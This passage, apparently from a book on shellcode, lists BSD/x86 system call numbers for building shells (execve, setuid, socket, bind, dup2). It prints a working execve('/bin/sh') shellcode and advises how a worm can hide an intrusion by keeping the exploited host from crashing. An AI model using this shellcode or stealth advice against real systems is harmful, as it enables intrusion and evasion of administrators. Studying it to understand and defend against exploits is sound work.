Operating systems from the BSD family implement a hybrid mechanism of calling system functions: they support both the far call to the 0007:00000000 address (however, the numbers of system functions are different) and the interrupt at vector 80h. Arguments in both cases are passed through the stack. The list of numbers of the most widely used system functions is provided in Listing 10.22. Listing 10.23 provides an example of shellcode demonstrating the use of system calls under BSD/x86.
Syscall       %EAX   stack
Execve        3Bh    RET, path = "//bin//sh", [a0 = 0], 0
Execve        3Bh    RET, path = "//bin//sh", [a0 = path, a1 = "-c", a2 = cmd, 0], 0
Setuid        17h    RET, uid = 0
Mkdir         88h    RET, path = "b..", mode = (each value is valid)
Chroot        3Dh    RET, path = "b..", "."
Chdir         0Ch    RET, path = ".."
Getpeername   1Fh    RET, sfd, sadr = [], [len = 10h]
Socket        61h    RET, AF_INET = 2, SOCK_STREAM = 1, prot = 0
Bind          68h    RET, sfd, sadr = [FFh, 2, hi, lo, 0, 0, 0, 0], [10h]
Listen        6Ah    RET, sfd, backlog = 5
Accept        1Eh    RET, sfd, 0, 0
dup2          5Ah    RET, sfd, fd = 0, 1, 2
char shellcode[]=       /* 23 bytes */
    "\x31\xc0"          /* XORL %EAX, %EAX     ; EAX := 0                                */
    "\x50"              /* PUSHL %EAX          ; Push the terminating zero into          */
                        /*                     ; the stack.                              */
    "\x68""//sh"        /* PUSHL $0x68732f2f   ; Push the string tail into the stack.    */
    "\x68""/bin"        /* PUSHL $0x6e69622f   ; Push the string head into the stack.    */
    "\x89\xe3"          /* MOVL %ESP, %EBX     ; Set EBX to the stack top.               */
    "\x50"              /* PUSHL %EAX          ; Push zero into the stack.               */
    "\x54"              /* PUSHL %ESP          ; Pass the zero pointer to the function.  */
    "\x53"              /* PUSHL %EBX          ; Pass the pointer to /bin/sh to          */
                        /*                     ; the function.                           */
    "\x50"              /* PUSHL %EAX          ; Pass zero to the function.              */
    "\xb0\x3b"          /* MOVB $0x3b, %AL     ; Number of the execve system function    */
    "\xcd\x80"          /* INT $0x80           ; execve("//bin//sh", "",0);              */
;
Restoring the usability of the vulnerable program after the overflow is not only a guarantee of keeping the intrusion a secret but also an indicator of a certain level of culture. Having accomplished its mission, the worm must not simply return control to the host program, because the host will almost certainly crash, which will make an administrator suspicious.
If every new TCP/IP connection is processed by a vulnerable program in a separate thread, then for the virus it will be enough to simply kill its thread by calling the TerminateThread API function. It is also possible to enter an endless loop (however, on a uniprocessor machine the CPU load might grow to 100%, which also raises suspicions).
With single-threaded applications, the situation is more difficult. The worm must "manually" restore the damaged data to a workable state or unwind the stack: it must emerge somewhere in a parent function not yet touched by the corruption, or even pass control to some dispatcher function involved in sending messages.
For the moment, no universal techniques have been invented, although in recent years this topic has been actively discussed and worked on.